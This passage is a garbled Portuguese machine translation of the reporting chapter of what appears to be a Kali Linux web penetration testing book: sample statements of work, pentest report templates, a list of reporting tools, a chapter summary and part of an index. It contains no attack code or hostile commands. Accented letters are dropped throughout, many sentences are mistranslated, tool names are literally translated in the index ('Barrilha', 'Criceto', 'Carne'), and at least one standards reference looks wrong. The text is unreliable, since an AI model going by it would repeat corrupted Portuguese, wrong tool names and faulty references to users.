voc espera realizar, e seu pblico-alvo ..
Exemplo de SOW sumrio executivo a seguinte:
O prestador de servios tem o prazer de apresentar o cliente com a nossa
metodologia para a realizao de uma avaliao de segurana. O principal objetivo da
CLIENTE para iniciar este compromisso o de avaliar o nvel atual de risco
e exposio adequadamente dentro da organizao, tendo em vista o foco de desenvolver
e / ou implementao de solues que ajudaro a reduzir as ameaas crticas e, finalmente,
mitigar o risco relevante.
Em resposta s necessidades do cliente, servio provedor tem delineado um
estratgia de avaliao de segurana eficaz, que tem provado ser muito bem sucedido em
elevar a postura de segurana em muitas organizaes similares. Nossa abordagem comea
com a compreenso dos requisitos de negcio relacionados com a avaliao,
seguido por um mapeamento detalhado topologia e base-revestimento do existente
infra-estrutura para ser identificado no escopo. Aps a concluso da descoberta do
infra-estrutura, comeamos uma avaliao de vulnerabilidade sistemtica de sistemas crticos e
dispositivos de rede para identificar vetores de ameaas que podem ser de natureza comportamental.
Um cuidado
mtodo de explorao analisada e executada para identificar a relevncia da
vulnerabilidades que foram detectados. Tcnicas como a testes de penetrao e
engenharia social pode ser empregado durante esta fase. Por fim, passamos semanal
briefings de status em todo o ciclo de vida do compromisso de rever as atividades
para a semana e comunicar metas e objectivos essenciais para as prximas semanas.
Isso proporciona cliente a oportunidade de informar os nossos engenheiros de qualquer sistema
atualizaes em andamento que necessitam de ateno especial. PRESTADOR DE SERVIOS
fornece conhecimentos de gesto de projectos credveis para garantir a excelncia operacional e
uma experincia superior ao cliente em todos os nossos compromissos e este no excepo.
SERVIO DE FORNECEDOR reconhece uma necessidade de negcio consistente para avaliar e
melhorar o
postura de segurana de uma organizao continuamente, e acreditamos que este compromisso
vai ajudar na reduo de despesas operacionais de riscos minimizados e tempo de inatividade,
enquanto
tambm fornecendo proteo de dados e de marcas de reputao benefcios para o Cliente.
[295]
Penetration Test Relatrio Executivo
Alm disso, o conhecimento adquirido a partir de tal exerccio fundamental no planejamento para
servios futuros que permitiro a realizao de negcios e rentabilidade. Esses benefcios
sejam coerentes e bem alinhado com os objetivos do cliente listado como segue:





Obter uma melhor compreenso de potenciais vulnerabilidades da rede CLIENTE
e riscos de segurana
Determine crtico arquitetura de segurana fraqueza dentro do CLIENTE
infra-estrutura
Avaliar a segurana associado com o site do cliente e
aplicaes de revestimento exterior
Relatrio de atividades: Um relatrio de todas as faanhas executadas (disponvel
em trs
nveis de detalhe).
Hospedar relatrio: Informaes de host detalhada, incluindo o nmero de
computadores comprometidos, o nmero mdio de vulnerabilidades
explorados em cada computador, e os nomes CVE de vulnerabilidades
encontrado em cada um dos computadores.
Relatrio de vulnerabilidade: Um relatrio detalhado de explorar com xito, contra
potenciais vulnerabilidades em cada computador.
Do lado do cliente Relatrio de teste de penetrao: A trilha de auditoria completa de
cada lado do cliente
Teste de Invaso, incluindo o modelo de e-mail enviado, explorar lanado,
resultados dos testes (sucesso ou falha), e detalhes sobre sistemas comprometidos.
Relatrio de usurio: Um relatrio de teste do lado do cliente dos quais links foram
clicados, quando
eles foram clicados, e por quem.



Teste de Invaso Externa
Uma ateno especial deve ser dada ao Teste de Invaso do externo
fontes. Um SOW Teste de Invaso externo identifica seu alvo e possvel
passos que voc est disposto a tomar durante o seu ataque. A DT tambm define quando voc
vai parar de teste ou que circunstncias esto fora do escopo. Em outras palavras, a porca
d-lhe um ponto de parada.
O prximo exemplo mostra um resumo Teste de Invaso externa. Ele inclui um
viso geral do processo de teste, seguido de um esboo com o passo-a-passo
Instrues de trabalho que ser realizada. Este exemplo tambm descreve o
cliente ea responsabilidade do proprietrio do aplicativo.
Teste web externo exemplo SOW:
[296]
Captulo 8
O objetivo central do nosso esforo externo e Teste de Invaso web explorar
os pontos fracos do permetro da rede, domnio web, web e de segurana inerentes
entrega de aplicativos. Elementos de entrega de aplicativos adjacentes, incluindo back-end
bancos de dados e middleware, tambm esto includos neste domnio e so avaliados
bem. As vulnerabilidades comuns e exploits que concentrar-se durante esta fase
so os relacionados a buffer overflows, injees de SQL e cross-site scripting.
Nossos engenheiros tambm podem envolver-se em um manual de navegao do domnio web
para
extrair outras peas de dados confidenciais e crticos. Alm disso, conforme solicitado pelo
CLIENTE, dispositivos na DMZ tambm ser includa neste Teste de Invaso
exerccio de uma tentativa de romper logicamente as defesas em torno da web
domnio de aplicao.
Procedimentos de teste detalhadas:
PRESTADOR DE SERVIOS ir completar os seguintes procedimentos de teste para a web
domnio de aplicao:










Identificar os servidores a serem testados, com base no site do cliente e rastreamento
um site para endereos colheita publicado no site.
Alavancar os principais motores de busca para localizar endereos para um determinado
domnio.
Localizar endereos em PGP e WHOIS bancos de dados.
Lanamento de vrios ataques simultneos, para acelerar o Teste de Invaso
processo.
Interaja com mquinas comprometidas atravs de agentes discretos que esto instalados
apenas na memria do sistema.
Execute exploits locais para atacar mquinas internamente, em vez de atravs do
rede.
Analisar aplicaes fora-de-the-box web para costume, e
falhas de segurana.
Validar exposies de segurana usando exploits geradas dinamicamente, emulando
um hacker tentando vrios caminhos e mtodos de ataque.
Demonstrar as conseqncias de um ataque atravs da interao com o servidor web
sistemas e bases de dados atravs de shells de comando e consoles de banco de dados de
arquivo.
Realizar testes de penetrao sem corromper aplicaes web ou em execuo
cdigo em servidores de destino.
Responsabilidades do cliente so os seguintes:


Identificar o domnio web para o qual a avaliao web ser executada.
Comunique-se a manuteno do servio e / ou impactos durante testes de penetrao.
Garantir a acessibilidade da web para domnios e dispositivos de permetro de alcance
se no
disponveis ao pblico.
[297]
Penetration Test Relatrio Executivo
Material adicional SOW

Outras reas a considerar quando se escreve um escopo de trabalho deve ser considerada. Alguns
o contedo comum recomendado para incluir so os seguintes:
Liberao Legal e testes: Geralmente isso pr-aprovado palavreado dos advogados
excluindo-se os proprietrios de aplicativos de realizar o prestador de servio responsvel por
quaisquer danos causados pelo teste de penetrao.
Metodologia e abordagem: Isto como voc pretende conduzir a penetrao
Test (regras de engajamento), como o cliente recebe atualizaes, cronogramas,
e como o cliente pode fornecer entrada. O diagrama a seguir fornece uma
exemplo de uma metodologia SOW:

Cartografia
e
Descoberta
Linha de Base
Auditoria e
Avaliar
Segurana
fraquezas
Polticas de Segurana
Normas
Remediao
e
Melhores Prticas
Avaliar e
Educar
Risco
Exposio
Lockdown
e
Proteger
Preo: Quanto tempo o trabalho necessrio para concluir e quanto ele vai custar.
Isso pode ser dividido em fases de projeto e deve incluir notao
horas quando esperados potencialmente poderia exceder preo projetado.
As expectativas e responsabilidades: O que o prestador de servios eo cliente
so atribudos durante o ciclo de vida do projeto. Deve haver notaes quando
passos necessrios por qualquer prestador de servios ou cliente um pr-requisito para a
futuro etapa do projeto.
[298]

Captulo 8
Credenciais e ferramentas: Normalmente, os clientes verificar as credenciais detidos pelo
pessoal a realizao de auditorias, bem como quais as ferramentas pode ser usada para
completar
tarefas. O fornecimento dessas informaes em uma DT acrescenta um grau de
credibilidade
e profissionalismo. Fornecer o potencial inicial conjunto de ferramentas tambm reduz
a probabilidade de que o cliente tenha uma reao negativa quando um negativo
impacto ocorre devido ao uso de uma ferramenta.
O exemplo a seguir mostra uma tabela que destaca uma amostra de Penetrao Rester
percia, juntamente com as ferramentas que sero utilizadas:
Certificaes e Credentials
ISC2 Certified Information Security Professional (CISSP)
International Council of E-Commerce Consultants (CEH)
Information Systems Audit and Control Association (ISACA)
Informaes Certified Systems Auditor (CISA)
RSA Authentication v8.0 Gerente
RSA DLP Sute Certified Systems Engineer (CSE)
RSA SecurID Escolha / Produtos
Cisco Certified Internetwork Expert (CCIE-RS, Segurana, Voz,
Armazenamento, SP)
SAINT Certified Engineers
Qualys Certified Engineers
Projeto sem fio Cisco Avanado Especialista
Project Management Professional do PMI (PMP)
Especialista Cisco Avanado Campo de Segurana
Especialista Cisco Avanado Campo sem fio
Cisco Mestre Segurana parceiro especializado
importante abordar as preocupaes que voc acredita que podem surgir adiantado.
Nosso
colega e amigo Willie Rademaker tem uma frase clebre: "Sempre
jogue o peixe na mesa ". Em outras palavras, evitar ter surpresas quando
um projeto est sendo escopo. Se voc acredita que pode haver um ponto de
conteno, abord-la na cabea. Surpresas so para aniversrios ... no de negcios.
Testando Ferramentas
Kali Linix
Backtrack 5 RC3
AirSnort
AirCrack
Airsnarf
AirMagnet
Impacto Ncleo
Santo
Rpido 7
Qualys
Metasploit
Paliada
eEye Retina
Ameaa Guarda
[299]
Penetration Test Relatrio Executivo
Kali ferramentas de
relatrios
Kali Linux inclui uma pequena seleo de ferramentas que podem ser usadas para a comunicao
organizar como uma equipe de captura da informao, bem como alguns utilitrios de criptografia.
Aqui est um breve resumo de algumas das ferramentas que poderiam beneficiar a sua
penetrao
prtica de teste.
Dradis
Dradis um framework open source para compartilhamento de informaes. Dradis fornece um
repositrio centralizado de informaes para acompanhar o que foi feito e
ainda precisa ser concluda. Dradis pode coletar informaes de membros da equipe,
fornecer ferramentas como o Nessus e Qualis, bem como a importao de informaes, tais como
listas de vulnerabilidade.
Para abrir Dradis, navegue at Ferramentas de Relatrios |Documentao e selecione Dradis.
Dradis acessado atravs de um navegador de Internet padro, simplificando a colaborao
entre grupos de pessoas. Para iniciar uma sesso, selecione Novo projeto para o Meta-Servidor
e fornecer uma senha que ser compartilhado entre os membros da equipe.
Para iniciar sesso, crie um nome e fornecer uma senha. Isso vai coloc-lo no principal
dashboard. Confira os assistentes e vdeos de demonstrao para aprender mais sobre como
usar
Dradis em seus servios.
[300]
Captulo 8
KeepNote
KeepNote um aplicativo de anotaes. Voc pode armazenar muitos tipos de notas e
rapidamente
ver tudo usando uma hierarquia de notebook com texto rico e formatao de imagem.
KeepNote pode ser encontrado em Ferramentas de Relatrios |Documentao e selecionando
KeepNote.
Maltego CaseFile
CaseFile uma aplicao de inteligncia visual usado para determinar as relaes e
mundo real liga entre centenas de diferentes tipos de informao. Isto faz
coleta de informaes e anlise de relacionamentos fceis para as investigaes.
MagicTree
MagicTree uma ferramenta de produtividade Tester Penetrao projetados para consolidao de
dados,
consulta, a execuo do comando externo e gerao de relatrios. A informao armazenada
em uma estrutura de rvore, tornando mais fcil para identificar os resultados de exerccios anteriores
e
formato para fins de relatrio.
[301]
Penetration Test Relatrio Executivo
CutyCapt
CutyCapt usado para capturar a pgina web de renderizao do Webkit em uma variedade de
bitmap
e formatos vetoriais que incluem SVG, PDF, PS, PNG, JPEG, TIFF, BMP e GIF.
Exemplos de relatrios
A seguir, exemplo relatrios que voc pode usar como modelos para as entregas de construo para
seus clientes:
Reportar testes de penetrao para o cliente do PRESTADOR DE SERVIOS:
Este documento contm informaes de provedor de servio que
confidenciais e privilegiadas. A informao destinado para o privado
uso de CLIENTE. Ao aceitar este documento, voc concorda em manter o
contedos em confiana e no copiar, divulgar ou distribuir este sem
confirmao pedido por escrito para e por escrito do PRESTADOR DE SERVIOS.
Se voc no for o destinatrio pretendido, estar ciente de que qualquer divulgao,
cpia ou distribuio do contedo deste documento proibida.
Detalhes do documento:
Empresa: CLIENTE
Documento: Relatrio de Teste de Invaso
Data:
Classificao: Pblico
Destinatrio: Empresa, nome, ttulo
Histria de Documento:
Data: Verso, autor, comentrios
1.0 Projecto
2.0 Review
Contedo:
1 Sumrio Executivo ............................................... ................. 4
1.1 Resumo ................................................ ............................. 4
1.1.1 Abordagem .............................................. ............................ 4
[302]
Captulo 8
1.2 Escopo ................................................ ................................. 5
1.3 Principais concluses ............................................... .............................. 6
1.3.1 Vulnerabilidade A ............................................. ...................... 6
1.3.2 Vulnerabilidade B ............................................. ...................... 6
1.3.3 Vulnerabilidade C. ............................................ ....................... 7
1.4 Recomendaes ................................................ ................ 8
1.5 Resumo ................................................ ............................ 10
2 Relatrio tcnico ............................................... .................. 12
2.1 A segurana da rede ............................................... ................ 12
2.1.1 ITEM 1 ............................................. ...................... 12
2.1.2 ITEM 2 ............................................. ...................... 14
2.2 vulnerabilidades em aplicaes Web ............................................ 16
3 Concluso ................................................ ........................ 21
Apndice ................................................. .............................. 22
Sumrio Executivo
1.1 Sumrio
CLIENTE atribuiu a tarefa de realizar testes de penetrao de Quarterly
<domnio>, ao PRESTADOR DE SERVIOS.
Este teste de penetrao foi realizada durante <Date>. O relatrio detalhado sobre cada
tarefa e nossos resultados so descritos a seguir.
O objetivo do teste determinar as vulnerabilidades de segurana nas configuraes
e aplicaes web em execuo nos servidores especificados como parte do escopo do trabalho.
Os testes so realizados assumindo a identidade de um atacante ou um usurio com malicioso
inteno.
1.1.1 Abordagem


Realizar exames gerais para identificar potenciais reas de exposio e servios que
podem agir como pontos de entrada.
Realizar exames e investigaes para validar vulnerabilidades encontradas alvo
dos alvos identificados durante as verificaes gerais.
[303]
Penetration Test Relatrio Executivo






Teste de componentes identificados para obter acesso.
Identificar e validar vulnerabilidades.
Classificao vulnerabilidades com base no nvel de ameaa, o potencial de perda e
probabilidade de
explorao.
Realizar atividades de pesquisa e desenvolvimento para apoiar a anlise. Identificar
questes de conseqncia imediata e recomendar solues.
Fornecer recomendaes para melhorar a segurana.
Transferncia de conhecimento.
Durante as verificaes de segurana de nvel de rede, buscou-se investigar as portas apresentar
em
vrios servidores e detectar servios em execuo com as falhas de segurana existentes, se
houver.
No nvel do aplicativo web, fizemos o check-configurao dos servidores web 'e lgica
erros no prprio aplicativo web.
1.2 Escopo
O escopo deste Penetration Test foi limitado aos seguintes endereos IP.
<endereo IP list>
<endereo IP list>
<endereo IP list>
1.3 Principais concluses
Esta seo apresenta um resumo das questes crticas descobertos durante a
Engajamento Teste de Invaso.
1.3.1 Vulnerabilidade A
Explicao de vulnerabilidade encontrada.
Recomendao para corrigir vulnerabilidade.
1.3.2 Vulnerabilidade B
Explicao de vulnerabilidade encontrada.
Recomendao para corrigir vulnerabilidade.
1.3.3 Vulnerabilidade C
Explicao de vulnerabilidade encontrada.
Recomendao para corrigir vulnerabilidade.
1.4 Recomendaes
[304]
Captulo 8
PRESTADOR DE SERVIOS AO CLIENTE recomenda desenvolver um plano de ao para o
endereo
problemas descobertos durante esta avaliao.
As recomendaes deste relatrio so classificados como ttico ou estratgico. Ttico
recomendaes so correes de curto prazo para ajudar a elevar a segurana imediata
preocupaes. Recomendaes estratgicas concentrar no ambiente global, o futuro
direes, e introduo de melhores prticas de segurana. Um dos destaques do
recomendaes segue:
1.4.1 Recomendaes tticos





Recomendao 1
Recomendao 2
Recomendao 3
Recomendao 4
Recomendao 5
1.4.2 Recomendaes Estratgicas
As avaliaes de segurana pr-ativa: Como parte das melhores prticas de segurana;
O CLIENTE dever assegurar que quaisquer mudanas importantes para a sua Internet
de frente para a infra-estrutura tem outra avaliao de segurana externa. Este um
precauo ao impacto de alteraes feitas conforme recomendado a partir desta
documento.
Intrusion Detection / Prevention (IDS / IPS): Redes expostas ao
trfego potencialmente hostil deve implementar alguma capacidade de detectar
intruses. Investigar uma soluo IDS para a rede.
Automatizado de controle de acesso de rede: A melhor prtica automatizar o controle de
quem eo que permitido o acesso rede especfica.


1.5 Resumo tabular
A tabela a seguir resume Avaliao da Vulnerabilidade do Sistema:
Categoria
Resumo da avaliao de vulnerabilidade de Sistemas
Nmero de Hosts ao vivo
Nmero de Vulnerabilidades
Alta, mdia e informaes gravidade
vulnerabilidades
100
35
21 6 8
Descrio
[305]
Penetration Test Relatrio Executivo
2.1 Segurana de Rede
2.1.1 ITEM 1
Descrio:
Durao Servio: SMTP, HTTP, POP3, HTTPS
Servio Detalhes Verso:
Anlise
Descrio
Nvel de Gravidade
Mdio
2.1.2 ITEM 2
REPEAT
Descrio sumria
Referncias: http://www.weblink.com
2.2 vulnerabilidades em aplicaes Web
Descrio dos riscos
Vulnerabilidade A
Vulnerabilidade B
Vulnerabilidade C
Vulnerabilidade D
Vulnerabilidade E
Vulnerabilidade F
Ameaa
Nvel
Grave
Grave
Grave
Moderado
Moderado
Baixo
Potencial
Perda Corporativo
Perda potencial
Perda potencial
Perda potencial
Perda potencial
Perda potencial
Perda potencial
Probabilidade de
Explorao
Possibilidade de ser
comprometida
Possibilidade de ser
comprometida
Possibilidade de ser
comprometida
Possibilidade de ser
comprometida
Possibilidade de ser
comprometida
Possibilidade de ser
comprometida
Recomendao
Remediao
Remediao
Remediao
Remediao
Remediao
Remediao
[306]
Captulo 8
Descrio dos riscos
Vulnerabilidade G
Vulnerabilidade H
Ameaa
Nvel
Baixo
Baixo
Potencial
Perda Corporativo
Perda potencial
Perda potencial
Probabilidade de
Explorao
Possibilidade de ser
comprometida
Possibilidade de ser
comprometida
Recomendao
Remediao
Remediao
A experincia tem mostrado que um esforo concentrado para resolver os problemas descritos nesta
relatrio pode resultar em melhorias de segurana dramticas. A maioria dos problemas identificados
exigem o conhecimento e compromisso com as boas prticas em vez de alto nvel
skillsets tcnicos.
Apndice
Esta seo fornece as imagens das vulnerabilidades conhecidas apresentados no
observaes e descobertas mesa.
Relatrio de teste de penetrao
Cliente:
Endereo
Informaes para contato
Provedor de servios:
Endereo
Informaes para contato
RELATRIO DE TESTE DE PENETRAO - Customer
ndice analtico
Sumrio Executivo
Resumo dos resultados
Narrativa de Ataque
Avaliao de Vulnerabilidade de rede
Avaliao Webserver Vulnerabilidade
Privilege Escalation
Mantendo o acesso a Alvos comprometidos
[307]
Penetration Test Relatrio Executivo
Privilege Escalation Domnio
Explorao contedo do banco de dados
Atacante Controle de Operaes de Clientes
Concluso
Recomendaes
Classificao de
Risco
Apndice A: Vulnerabilidade Detalhe e Mitigao
Vulnerabilidade A
Vulnerabilidade B
Vulnerabilidade C
Vulnerabilidade D
Apndice B: Lista de alteraes feitas aos Sistemas Archmake
Apndice C: Sobre Offensive Security
Sumrio Executivo
PRESTADOR DE SERVIOS foi contratada para realizar um teste de penetrao contra
Presena na web externo do cliente. A avaliao foi realizada de forma
que simulava um ator malicioso envolvido em um ataque direcionado contra a empresa
com os objetivos da seguinte forma:


Identificar se um atacante remoto pode penetrar as defesas do CLIENTE
Determinar o impacto de uma falha de segurana em:



A integridade de segurana da empresa
A confidencialidade das informaes da empresa
A infra-estrutura interna e disponibilidade dos clientes da
sistemas de informao
Os resultados desta avaliao sero utilizados pelo Cliente para orientar as decises futuras
quanto direo de seu programa de segurana da informao. Todos os testes e aes foram
conduzida sob condies controladas.
Resumo dos resultados
[308]
Captulo 8
Reconnaissance Rede foi realizado contra o espao de endereo fornecido pelo
CLIENTE com o entendimento de que esta gama de alvos seria considerado
o escopo para este compromisso. Determinou-se que a empresa mantm
presena externa mnima, consistindo em um site externo e outros servios
identificado pelo PRESTADOR DE SERVIOS durante Reconnaissance de CLIENTE.
Ao rever a segurana do site principal cliente, descobriu-se
que um plugin vulnervel foi instalado. Este plugin foi explorada com sucesso,
levando ao acesso administrativo. Este acesso foi utilizada para obter acesso interativo
para o sistema operacional subjacente, e, em seguida, encaminhado para privilgios de root.
PRESTADOR DE SERVIOS foi capaz de usar o acesso administrativo foi identificar interno
recursos de rede. A vulnerabilidade em um sistema interno foi aproveitado para ganhar locais
acesso ao sistema, que foi ento escalado para direitos de administrador de domnio. Isto colocou
toda a infra-estrutura da rede sob o controle dos atacantes.
Narrativa de Ataque
<Network Vulnerability Assessment Details>
<webserver Vulnerability Assessment Details>
<Privilege Escalation Details>
<Maintaining Acesso ao Alvos comprometidos Details>
<domain Escalation Privilege Details>
<Database Contedo Explorao Details>
Concluso
No decorrer do teste de penetrao externa, CLIENTE sofreu uma cascata
srie de violaes que levaram a condies que prejudicam diretamente a empresa como
bem como os seus clientes.
Os objetivos especficos do teste de penetrao foram demonstrados como
segue:


Identificar se possvel a um atacante remoto para penetrar ciberntico do CLIENTE
defesas
Determinar o impacto de uma falha de segurana em:



A integridade dos sistemas da empresa.
A confidencialidade das informaes dos clientes da empresa.
A infra-estrutura interna e disponibilidade das informaes do cliente
sistemas.
[309]
Penetration Test Relatrio Executivo
Baseado servios fornecidos, foi determinado que um invasor remoto seria capaz
para penetrar as defesas do cliente. O vector invasor inicial identificado como crtico,
porque pode ser descoberto remotamente atravs de varrimento automatizado. O impacto de
explorar tais vulnerabilidades podem paralisar rede do cliente e marca.
Recomendaes
Louvamos ao cliente para ser pr-ativo na gesto de risco de tecnologia e
segurana da rede por meio de aquisio de nossos servios. Devido ao impacto da geral
organizao como descoberto por este teste de penetrao, os recursos adequados
recomendado para ser alocado para assegurar que os esforos de remediao so realizadas em
tempo hbil. Enquanto uma lista abrangente de itens que devem ser implementadas
est para alm do mbito do presente compromisso, alguns itens de alto nvel so importantes para
citar:
Implementar um programa de gerenciamento de patch: Muitas das vulnerabilidades
identificadas
poderiam ser evitados com o gerenciamento de patches adequada. Recomendamos seguinte
as orientaes descritas no NIST SP 800-408 como uma fonte para o desenvolvimento de
polticas de segurana para gerenciamento de patches adequada. Isto ir reduzir o risco de
execuo de sistemas vulnerveis.
Impor controle de mudanas em todos os sistemas: As vulnerabilidades comuns so
causado por erro humano. Muitos problemas de configurao incorreta poderia ser
evitado
atravs de uma mudana forte e processo de controlo em todos os sistemas activos.
Multifatorial Alavancagem e controle de acesso baseado em funo: Alguns sistemas
crticos
Foram encontrados alavancando a segurana da senha como os nicos meios de validar
pessoas autorizadas. A melhor prtica ter, pelo menos, duas formas de
autenticao, juntamente com a limitao do acesso conta de administrao.
Restringir o acesso a sistemas crticos: Sistemas crticos devem ser isolados a partir de
outros sistemas usando listas brancas, ACLs, VLANs, e outros meios. O projeto
conceito de privilgio mnimo vai limitar a quantidade de dano que um atacante pode
provocado usando um recurso comprometida. Consulte NIST SP 800-27 RevA11 para
orientaes sobre a obteno de uma linha de base de segurana para sistemas de TI.



Classificao de
Risco
O risco global identificado pelo provedor de servio para o cliente dividido
entre crtica e Baixo, definida da seguinte forma. PRESTADOR DE SERVIOS identificado
trs vulnerabilidades crticas que foram usados para obter acesso aos clientes da interna
rede.


Crtico: Ameaa imediata para os processos-chave de negcios
Alta: Ameaa indireta a chave processos de negcio / ameaa de negcio secundrio
processos
[310]
Captulo 8


Meio: Indireta ameaa / parcial aos processos de negcio
Baixa: No existe nenhuma ameaa direta; vulnerabilidade pode ser alavanca com
outro
vulnerabilidades
O nvel de risco atual de sistemas testados, com base no nvel de risco mais elevado de resultados
em sistemas crtico durante os testes, um total de trs (3) Crtica, dois (2) Mdio,
e dois (2) foram identificados baixos vulnerabilidades.
Apndice: Vulnerabilidade Detalhe com Mitigao
<Vulnerability A information>
Resumo
Este captulo conclui este livro, fornecendo orientaes para o desenvolvimento profissional
prestao de servios ao cliente relatrios de testes ps-penetrao. Invadir
sistemas e outras mos sobre o trabalho tcnico divertido, no entanto, relatrios detalhados e
prticas comerciais slidas pagar as contas. O que torna uma prtica de servios profissionais
sucesso a capacidade de se tornar um conselheiro de confiana para o seu campo relacionado.
Para
requisitos de segurana, isso significa ajudar os clientes a atender s normas de conformidade,
reduzir o risco de vulnerabilidades e melhorar a forma de identificar ameaas.
O primeiro tema abordado foi o cumprimento, porque esse um mtodo comum para mostrar
valor para a aquisio de servios. Encontramos os clientes a encontrar oramento, quando houver
risco
de no cumprir um mandato ou reagir a um incidente recente, para saber mais
padres populares ir melhorar a sua capacidade de importar para seus clientes. Em seguida, ns
olhou para os diferentes mtodos de projeto de lei para os servios, bem como algumas coisas a
olhar para fora
sobre citando para um projeto. Depois disso, quebrou os diferentes componentes
de um documento entrega prestao de melhores prticas para a prestao de resultados para o seu
clientes. Ns adicionamos uma seo final que cobria algumas ferramentas de relatrios disponveis
em
Kali Linux que poderia ajudar a gerar informaes para suas entregas dos clientes.
Realmente gostei de escrever este livro e espero que o ajude com o seu aplicativo web
Objetivos do teste de penetrao. Obrigado pela leitura.
[311]
ndice
Smbolos
Opo-t 55
A
acccheck 209
relatrio de actividade 296
Guia Alertas, OWASP-Zap 92
Expectativa de perda anual (ALE) 15
Taxa Anual de Ocorrncia (ARO) 15
apndices 294
Application Delivery Controller (ADC)
aparelhos 264
ataques na camada de aplicao 236
comando apt-get update 212
arpspoof 193, 194
Valor Patrimonial (AV) 15
ataque
cenrios, por scapy 238, 240
Guia de configurao Attack, WebSlayer 114
autenticao 175
Autpsia 271-274
BIOS (Basic Input Output System)
senha 173
Teste de caixa preta 9
Navegador Explorao quadro. Ver Carne
ataque de fora bruta
cerca de 107, 152
DirBuster 110-112
Hydra 107
WebSlayer 113-119
bulk_extractor 276
BURP Proxy
cerca de 218-221
Arrotar Aranha 221
Funo Aranha, utilizando 222-225
Arrotar Aranha 221
C
Center for Internet Security (CIS) 254
Autoridade de Certificao, OWASP-Zap 90
certificaes de 299
Certified Ethical Hacker (CEH) 287
Certified Information Security Systems
Professional. Ver CISSP
Chkrootkit 271
chntpw 161-164
CIA 14
Cisco Protection Network Foundation
(NFP) 254
CISSP
cerca de 15, 175
Fatores de 175
Clickjacking
cerca de 177
URL, ferramenta para download de 178
B
Carne
cerca de 212
comando apt-get update 212
hook.js 214
instalao de 212
comeando 212
URL 212
Sistema Beef 41
Binwalk 274
Defesa Clickjacking 264
clientes 73
ataques do lado do cliente 129
do lado do cliente Penetrao Relatrio de teste 296
clonagem 132
ferramentas de clonagem 259
CmosPwd 173
Carto de Acesso Comum (CAC) 176
Common Log Format (CLF) 208
observncia
cerca de 278
cumprimento da indstria 278, 279
confidentility 283
Biscoito Cadger
cerca de 184-186
sesses reconhecidos 187
sesso de informao pedido 187
defesa do bolinho 263
Biscoito Injector 182
bolinhos
cerca de 178
ataques de seqestro de sesso, as limitaes de 179
roubar 179
Os cookies Gestor + 183
folha de rosto 283
guia rastreador, ProxyStrike 84
creddump 174
credenciais 299
Proteco das Infra-(CIP) 280
Cross-site scripting. Ver XSS
Crunch 15-170
CutyCapt 302
D
DBPwAudit 210
dc3dd 269, 270
DDoS. 235
defesa
cerca de 251
Defesa Clickjacking 264
defesa do bolinho 263, 264
Negao de Servio defesa 262
Man-in-the-middle defesa 259
Defesa tira SSL 262
teste 252
Sistemas de Informao de Defesa
Agncia (DISA) 254
defesas, testes
cerca de 252
segurana da linha de base 253
senha, polticas 256
gerenciamento de patches 254, 255
Guia de Segurana Tcnico de Implementao
(STIG) 254
Definio do alvo Espao 12
Definio do sistema de destino (s) 11
Negao de Servio defesa 262
Denial of Services. Ver DoS
Departamento de Defesa (DOD) 254
ataque de dicionrio 152
dictstat
cerca de 171
execuo 172
Dig (informaes de domnio groper) 54
forense digital 265, 266
DirBuster
cerca de 110-112
Boto Relatrio 113
Distributed Denial of Service. Ver DDoS
DNS
alvo, identificao 55, 57
DNSCHEF 245, 246
Reconnaissance DNS
tcnicas de 54, 55
Domain Name System (DNS) 245
DoS.
cerca de 235
ataque, categorias 236
Categorias de ataque de negao de servio
ataques na camada de aplicao 236
ataques de protocolo 236
exausto sesso 236
de volume baseado ataques 236
Dradis 300
Emalhe 198
dsniff
cerca de 193
comeando 195
[314]
E
Eletrnico coleta de dados, anlise,
e Recuperao. (EDGAR) 40
sistemas de e-mail
explorando 105-107
Ettercap
cerca de 196
opes de menu 197
sumrio executivo 285, 286
explorao
golos 19
ferramentas 19, 20
Ferramentas de Explorao 30
Guia Exploit, w3af 104
F
DNS Falso 245
comando fdisk-l
montagem 154
Federal Energy Regulatory
Comisso (FERC) 280
Federal de Processamento de Informaes
Standards (FIPS) 279
Federal de Segurana da Informao
Lei de Gesto (FISMA) 280
Ferret 192
Roteiro Fierce
comando, para a execuo de 56
Anlise do Sistema de Arquivos
com Kali 267-269
Fimap
cerca de 234
utilizando 234
findmyhash 173
FireFox Plugins
cerca de 180
arpspoof 193, 194
Biscoito Cadger 184-187
Biscoito Injector 182
Os cookies Gestor + 183
Emalhe 198
dsniff 193-195
Ettercap 196-198
Firesheep 180
Greasemonkey 182
Hamster 190-192
man-in-the-middle ataque 193
Web Developer 180
Wireshark 187-190
Firesheep 180
Bandeira
definindo 12
FOCA
cerca de 66-72
URL, para download 67
Pegada de alvo
estabelecer 33
Acima de tudo 275
forense 31
Forensics Bota 266, 267
ferramentas forenses
cerca de 271
Autpsia 271-274
Binwalk 274
bulk_extractor 276
Chkrootkit 271
Acima de tudo 275
Pasco 275
pdf-parser 275
Scalpel 276
FoxyProxy
cerca de 216
proxy, adicionando 217
comando 53 fping
G
GHDB
cerca de 45
acessando 46
tela inicial 48
consulta de pesquisa, a seleo de 47
URL 46
GIAC Penetrao Tester (GPEN) 287
glossrio 294
Google Hacking 44, 45
Banco de Dados do Google Hacking. Ver GHDB
Teste de caixa cinza 10
Greasemonkey 182
H
hackers
quebra de senha, caminhos 152
[315]
Criceto 190-192
Hardware Hacking 31
hashcat 159
Hash-identificador 170
hashing 152
Seguro de Sade Portabilidade e
Accountability Act (HIPAA) 253, 279
hexinject 209
sediar reportar 296
sediar a digitalizao
cerca de 144
com Nessus 145
Aba Mquinas, NMap 64
HTTrack
cerca de 49, 257, 258
comando, exibindo 51, 52
diretrio, selecionando 50
comeando 50
utilizando 49
hbrido 152
Hidra
cerca de 107-110
J
Java Applet de Ataque 134
ofertas de empregos 41
Johnny
cerca de 156
Guia Sada 158
Guia Estatsticas 158
utilizando 156
John the Ripper
cerca de 119
abertura 120
operao 120
utilizando, em arquivo de senhas 121
K
Barrilha
ferramentas de quebra de senhas 155
Kali Linux
cerca de 17, 21
e VM imagem 29
DNSCHEF 245, 246
explorao 19
instalao, material de 22
instalar 22-28
Inundator 248
Manter Foothold, metas 20
Physical Address Extension (PAE) 21
escalao de privilgios 19, 20
Reconnaissance 17
elaborao de relatrios, ferramentas 300
em execuo, a partir de uma mdia externa 21
Siege 247
SniffJoke 246
configurao do sistema 21
alvo, avaliando 18
TCPReplay 248
conjunto de ferramentas 29-31
URL, para download 21
Kali Linux, ferramentas
Ferramentas de Explorao 30
forense 31
Hardware Hacking 31
Coleta de informaes 30
Ferramenta de acesso Manter 30
Ataques senha 30
Eu
ICMP Reconnaissance
tcnicas de 52, 53
comando ifconfig 122
cumprimento da indstria
